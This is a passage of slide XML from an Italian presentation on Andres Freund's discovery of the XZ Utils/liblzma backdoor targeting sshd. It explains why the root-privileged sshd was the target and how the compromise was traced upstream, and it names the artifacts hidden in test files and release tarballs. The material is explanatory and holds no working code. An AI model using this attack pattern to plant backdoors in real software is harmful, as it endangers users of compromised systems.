              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>è il vettore d'attacco;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Il servizio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sshd.service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> è l'obiettivo interessato dall'iniezione di codice eseguibile.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, Carattere, linea, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86851EF7-7415-C6A9-2955-1E03D0AF4A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782" y="3329584"/>
            <a:ext cx="10298999" cy="1016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7138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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La scoperta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>andres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>freund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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1948474"/>
            <a:ext cx="11866844" cy="31085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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Perché </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> come target?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Il protocollo SSH consente la connessione di un utente remoto, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" u="sng" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>purchè</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> autorizzato</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Quando eseguito come service, cioè integrato con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> è istanziato di default come processo privilegiato, appartenente allo user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> (UID=0). In altre parole, ciò significa che </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>qualsiasi cosa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> venga eseguita all'interno del processo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> possiede il livello più alto di autorizzazioni sul sistema.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17946068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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La scoperta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>andres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>freund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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11866844" cy="458587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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Perché SSH va in overhead?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Cond"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Non sembra chiaro cosa tenga impegnato </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>quando integrato con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>) circa 1,7 volte in più rispetto al solito. Andres Freund procede quindi con analisi più dettagliate, una sessione di reverse engineering con strumenti come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> per ispezionare più nel profondo il funzionamento di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Notando comportamenti strani nel caricamento e nella risoluzione dei simboli per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> versione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>5.6.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>5.6.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>, invia una segnalazione discreta a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New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security@debian.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>, presumendo una compromissione nel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>branch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> downstream di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Dopo ulteriori analisi, risulterà chiaro che il pericolo è arrivato dal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>branch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> upstream.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17172570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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La scoperta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>andres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>freund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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11866844" cy="427809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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gli artefatti chiave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Risalendo i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>branch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> di XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, è possibile vedere gli artefatti necessari per l'installazione della backdoor:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Due file compressi in  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/test/files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, folder presente sia in upstream che in downstream:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bad-3-corrupt_lzma2.xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>good-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>large_compressed.lzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Un trigger presente nelle release </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tarballs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
